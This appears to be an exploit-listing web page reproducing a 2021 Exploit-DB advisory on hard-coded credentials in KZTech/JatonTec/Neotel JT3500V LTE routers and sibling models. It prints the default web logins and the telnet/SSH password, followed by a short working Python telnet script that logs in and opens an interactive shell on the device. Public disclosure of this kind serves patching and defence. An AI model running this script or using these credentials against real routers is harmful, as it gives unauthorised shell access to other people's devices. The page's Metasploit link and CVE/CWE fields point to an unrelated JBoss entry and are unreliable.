header-logo
Suggest Exploit
vendor:
JT3500V
by:
LiquidWorm
4.8
CVSS
MEDIUM
Hard coded Credentials Shell Access
287
CWE
Product Name: JT3500V
Affected Version From: 2.0.0B01
Affected Version To: 2.0.1B1064
Patch Exists: YES
Related CWE: CVE-2021-20220
CPE: h:kzbtech:jt3500v
Metasploit: https://www.rapid7.com/db/vulnerabilities/red_hat-jboss_eap-cve-2021-20220/
Other Scripts: N/A
Platforms Tested: None
2021

KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 – Hard coded Credentials Shell Access

A vulnerability has been discovered in KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1, which allows an attacker to gain access to the device's shell using hard coded credentials. The vulnerability is due to the presence of hard coded credentials in the device's web interface. An attacker can exploit this vulnerability by using the hard coded credentials to gain access to the device's shell. This can allow an attacker to gain access to the device's configuration, modify settings, and execute arbitrary code.

Mitigation:

Users should update their devices to the latest version of the firmware.
Source

Exploit-DB raw data:

# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                  http://www.jatontec.com/products/show.php?itemid=258
                  http://www.jatontech.com/CAT12.html#_pp=105_564
                  http://www.kzbtech.com/AM3300V.html
                  https://neotel.mk/ostanati-paketi-2/

Affected version:  Model | Firmware
                  -------|---------
                 JT3500V | 2.0.1B1064
                 JT3300V | 2.0.1B1047
                 AM6200M | 2.0.0B3210
                 AM6000N | 2.0.0B3042
                 AM5000W | 2.0.0B3037
                 AM4200M | 2.0.0B2996
                 AM4100V | 2.0.0B2988
                AM3500MW | 2.0.0B1092
                 AM3410V | 2.0.0B1085
                 AM3300V | 2.0.0B1060
                 AM3100E | 2.0.0B981
                 AM3100V | 2.0.0B946
                 AM3000M | 2.0.0B21
                 KZ7621U | 2.0.0B14
                 KZ3220M | 2.0.0B04
                 KZ3120R | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.

Desc: The device utilizes hard-coded credentials within its Linux
distribution image. These sets of credentials are never exposed to
the end-user and cannot be changed through any normal operation of
the router.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
           Linux 2.6.36+ (mips)
           Mediatek APSoC SDK v4.3.1.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5637
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5637.php


03.02.2021

--


Default web creds:
------------------
admin:admin123
user:user123

Telnet/SSH access:
------------------
admin:root123

===

import telnetlib

host="192.168.1.1"
user="admin"
password="root123"
s=telnetlib.Telnet(host)
s.read_until(b"CPE login: ")
s.write(user.encode('ascii') + b"\n")
s.read_until(b"Password: ")
s.write(password.encode('ascii') + b"\n")
s.write(b"busybox\n")
print(s.read_all().decode('ascii'))
s.mt_interact()
s.close()

Navigation

Suggest Exploit

Services By CQR